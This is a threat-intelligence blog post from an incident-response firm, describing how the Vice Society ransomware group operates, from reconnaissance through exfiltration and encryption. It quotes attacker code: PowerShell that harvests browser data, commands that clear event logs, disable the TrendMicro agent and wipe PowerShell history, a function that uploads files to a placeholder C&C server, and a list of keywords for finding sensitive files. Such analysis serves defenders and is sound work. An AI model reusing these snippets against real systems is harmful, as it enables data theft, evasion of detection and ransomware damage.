CONTACT US

Vice Society TTPs: Insights from a Real-World Ransomware Investigation

Get technical insights based on forensic investigations of Vice Society (ransomware group carrying out double extortion attacks) conducted by our IR team.

Key Takeaways

  • Vice Society is a ransomware group that has been carrying out double extortion attacks for over a year. While continuing to wage attacks, the group remains stealthy and is keeping their modus operandi under the radar.
  • The group deletes evidence and traces of their activities, which hinders investigation efforts. They also use backdoor DLLs written in Go and PowerShell scripts, avoiding classification and detection by common EDR and security tools.
  • The group uses HelloKitty ransomware to encrypt Linux hosts and Zeppelin ransomware to encrypt Windows hosts.
  • This blog presents up-to-date technical insights based on forensic investigations conducted by Sygnia’s IR team, so other security teams can respond to future attacks by the Vice Society group.

Introduction

Vice Society is a threat actor that came to public attention in mid-2021 and is one of the many criminal groups who perform double extortion attacks. These extortion tactics include encryption of hosts and exfiltration of data, with the group threatening to leak sensitive information if the requested ransom is not paid.

Vice Society has been known to target entities from the health and education sectors and has managed to keep its technical modus operandi under the radar of security and incident response teams. This is due to the group’s efforts in cleaning up after their activities, deleting logs and traces of evidence that could provide insights to their origins and operations.

Using intelligence gleaned from IR engagements our team participated in, this blog post shines light on details of recent Vice Society ransomware attacks and operations – from how the group discovers different network assets, to their lateral movement activities, through data exfiltration, encryption, and the ensuing threats of leakage.

Reconnaissance

As part of their initial reconnaissance steps, Vice Society downloads and uses commercial software to scan the network, such as Advanced Port Scanner.

When the group identifies an interesting host, they execute PowerShell scripts designed to collect data:

  • The first, SessionGopher, is an open-source PowerShell script that leverages Windows Management Instrumentation (WMI) to collect user data related to remote sessions, such as RDP and Putty. The data collected includes private keys and passwords.
  • The second is a PowerShell script that collects browser-related artifacts, including browsing history and bookmarks from several different browsers.

This data helps the threat actor obtain information about potentially interesting user accounts and remote servers. That information is used to attempt to gain access to the accounts and servers.

These scripts, and others that are referred to later, were saved more than once over the course of the attack under the same filename with changes to the file content.

1. {[array]$items = @();
2. $path=”$env:systemdrive\users\*\appdata\local\google\chrome\user data\default\bookmarks”
3. get-childitem -path $path | foreach-object {
4. $uregex = ‘\\users\\([^\\]+)\\’;
5. $user = $_.fullname | select-string -pattern $uregex -allmatches | select-object -expandproperty matches;
6. $username = $user.groups[1].value;
7. $json = get-content $path
8. $output = convertfrom-json20($json)
9. $jsonobject = $output.roots.bookmark_bar.children;
10. $jsonobject | foreach-object {
11. $items += new-object -typename psobject -property @{
12. user = $username
13. browser = ‘chrome’
14. datatype = ‘bookmark’
15. data = $_.url}}}}
Figure 1: Browser Collection’ script, showing reading of Chrome bookmarks from the %appdata% folder

Credential Access

After obtaining access to a host, Vice Society performs a well-known tactic known as ‘NTDS.dit dumping’ to gain access to a privileged account within the network. The dump is performed by creating a Volume Shadow copy of the Active Directory Database that holds user credential data; this technique makes use of the LOLBin (Living Off The Land Binaries) ntdsutil.exe.

Lateral Movement

Vice Society combines several tools and techniques to move from one compromised host to another: Windows Sysinternal PsExec utility, Remote Desktop Protocol, and the PowerShell interactive ‘Enter-PSSession’ command. The threat group checks for current RDP connections using the ‘quser’ command and ensures that their own connection does not interfere with other live RDP sessions.

Defense Evasion

As mentioned previously, Vice Society attempt to cover their tracks both in real time and in retrospect, making it difficult to detect their activities. They use the following methods to evade detection:

1. Staging Folders

They use system and other software-related paths as their staging folders. Files have been found in the following folders:

1. C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\
2. C:\ProgramData\<NonMaliciousSoftware>\
3. C:\Users\<User>\AppData\

2. Hidden Shares

They conceal payloads using hidden shares. By appending a dollar sign to the end of shared folder names, the group creates shares that are not visible by default, such as ‘C:\C$’.

3. Disabling Security Tools

They manually disable security tools. For example, using this command to unload the TrendMicro OfficeScan agent:

‘c:\program files (x86)\trend micro\officescan client\pccntmon.exe’ -n <password>

4. Clearing Windows Event Logs

They delete essential logs, after finishing various sections of work.
The following command deletes Windows EVTX logs:
wevtutil cl <log_name>

wevtutil cl <log_name>

5. Removing Tools and Scripts
They destroy residual evidence from their working directories and PowerShell history, using the following PowerShell commands:

1. remove-item -path $env:temp\* -recurse -force -erroraction silentlycontinue
2. remove-item c:\users\$env:username\appdata\local\temp -recurse -force -erroraction silentlycontinue
3. remove-item $env:userprofile\appdata\local\temp -recurse -force -erroraction silentlycontinue
4. remove-item c:\windows\temp -recurse -force -erroraction silentlycontinue
5. remove-item c:\users\$env:username\appdata\roaming\microsoft\windows\powershell\psreadline\
consolehost_history.txt

 Command & Control

o ensure versatility and stability, Vice Society set up multiple Command & Control servers, each with a different backdoor connection. We identified the use of the following tools:

  1. SystemBC
    To communicate with compromised systems in the network, the group uses SystemBC – a RAT and SOCKS5 proxy tool. This tool supports connections over TOR and is widely used as a prelude to ransomware, distributed by Exploit Kits, and types of malware such as Emotet.
    In the past, it was utilized by ransomware operators such as Cuba, Ryuk and Egregor.
    SystemBC can execute encrypted payloads downloaded from the C&C server, including DLL files and Shellcodes. The group uses both the PowerShell version of the tool and the compiled executable for maintaining their presence (see below).
  2. Proprietary Go DLLs
    A backdoor written in Go, hardcoded with the IP and the port of a C&C server, was identified; this backdoor is used to maintain persistence (see below) and contains proxy functionality.

Persistence

Vice Society use a combination of techniques to maintain persistence in the network:

  1. Scheduled Tasks
    1. A scheduled task named ‘wow64’ is created, which executes the SystemBC backdoor upon startup. This happens as part of the first execution of the backdoor script itself.
    2. A scheduled task named ‘System’ is created, which executes the Go DLL backdoor on startup.
  2. Registry Run Key
    1. A run key value named ‘socks’ is added, which executes the PowerShell version of SystemBC. The full script is copied into the value, having no need to point to a file.

Data Exfiltration

Before encrypting the data that was revealed during their reconnaissance activities, the group exfiltrates sensitive information to an external server, using a PowerShell script. The script uses specific keywords in filenames to retrieve sensitive data. It also excludes certain file extensions and folder names to avoid large or system files.

1. [string]$prefix = ‘http://<c&c_ip:port>/’;
2. add-type -assemblyname system.web;
3. $wc = new-object system.net.webclient;
4. $path = $filename -replace “\\”, “/” -split “:”;
5. [string]$fullpath = $path[1];
6. $fullpath = [system.web.httputility]::urlencode($fullpath);
7. [string]$uri = “$($prefix)?token=$($token)&id=$($id)&fullpath=$($fullpath)”;
8. $wc.uploadfile($uri, $filename);
Figure 2: PowerShell script exfiltration function, demonstrating file upload using ‘system.net.webclient’

Analyzing keywords used for exfiltration correlates highly with Vice Society’s known victims. Relevant keywords include American tax and health-related file names – such as W9, 1099, and ACA 1095 – as well as other keywords in Spanish and German.

“*1040*”,
“*aca*1095*”,
“*1099*”,
“*8822*”,
“*brett*”,
“*freeman*”,
“*9465*”,
“*401*k*”,
“*4506*t*”,
“*isa*”,
“*nin*”,
“*sin*”,
“*national*insurance*”
<…>
“*social*”,
“*nds*”,
“*numero de sociale*”
“*freier*”,
“*abrh*”
<…>
“*addres*”,
“*zustimmen*”,
“*arh*”,
“*balanc*”,
“*bank*”
Figure 3: Partial code from exfiltration PowerShell script showing searched RegEx file names

To expedite the exfiltration phase, the PowerShell exfiltration script is executed remotely in parallel on a group of target hosts via PsExec. Vice Society does not stage or compress data before exfiltration. Instead, each file on the victim network that matches the exfiltration script’s criteria (keyword and exclusion lists) is directly exfiltrated to the C&C server.

Ransomware Execution

After the exfiltration is complete, the encryption phase starts. Vice Society encrypts both Windows and Linux hosts, creating a larger and potentially more severe impact to the victim. Vice Society use two types of ransomware variants in a single attack:

  1. HelloKitty ransomware – HelloKitty is used to encrypt Linux ESXi hosts. The ransomware binary is copied to the ESXi systems using WinSCP and then executed.
  2. Zeppelin ransomware – Zeppelin is used to encrypt Windows machines. The ransomware is deployed using PsExec, likely executed by a batch script that enumerates a list of victim machines it reads from a text file.

As part of the execution, the Zeppelin ransomware adds itself to the Registry Run Key of the ‘HKEY_CURRENT_USER’ hive, in what seems to be the malware’s attempt to ensure a complete encryption process. Adding itself to the Registry Run Key will cause the ransomware to execute once a user logs in in case the host was turned off before the encryption is completed. Once the malware finishes running successfully it deletes itself.

As an additional attempt to slow down recovery and restoration efforts and create additional leverage for the group upon entering negotiations, the group changes the passwords of high privilege users.

In Windows environments, the group changed the passwords of the domain administrator account and on Linux systems, the ‘root’ and other service user account passwords were changed. For example, in the case of an ESXi server, attempts to change passwords of the ‘vpxuser’ and ‘hxuser’ were identified.

The following commands were observed for changing user passwords in Windows and Linux operating systems:

1. Windows

net user <username> <new password> /domain

2. Linux

passwd <username>

MITRE ATT&CK Mapping

Reconnaissance

Active Scanning (T1595)
Gathering Victim Host Information (T1592)

Execution

Command and Scripting Interpreter: PowerShell (T1059.001)
Command and Scripting Interpreter: Windows Command Shell (T1059.003)
System Services: Service Execution (T1569.002)

Collection

Automated Collection (TA0009)

Persistence

Scheduled Task/Job (T1053)
Account Manipulation (T1098)
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001)

Defense Evasion

Indicator Removal on Host: Clear Windows Event Logs (T1070.001)
Indicator Removal on Host: Clear Command History (T1070.003)
Impair Defenses: Disable or Modify Tools (T1562.001)
Hide Artifacts: Hidden Files and Directories (T1564.001)

Credential Access

OS Credential Dumping: NTDS (T1003.003)

Lateral Movement

Remote Services: Remote Desktop Protocol (T1021.001)

Command & Control

Proxy: External Proxy (T1090.002)

Exfiltration

Automated Exfiltration (T1020)

Impact

Data Encrypted for Impact (T1486)
Account Access Removal (T1531)

If you were impacted by this attack or are seeking guidance on how to prevent similar attacks, please contact us at [email protected] or our 24-hour hotline +1-877-686-8680.

This blog post and any information or recommendation contained herein has been prepared for general informational purposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to any entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources and to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is not responsible for any errors or omissions, or for the results obtained from the use of this blog post. This blog post is provided on an as-is basis, and without warranties of any kind.

subsctibe decor
Want to get in touch?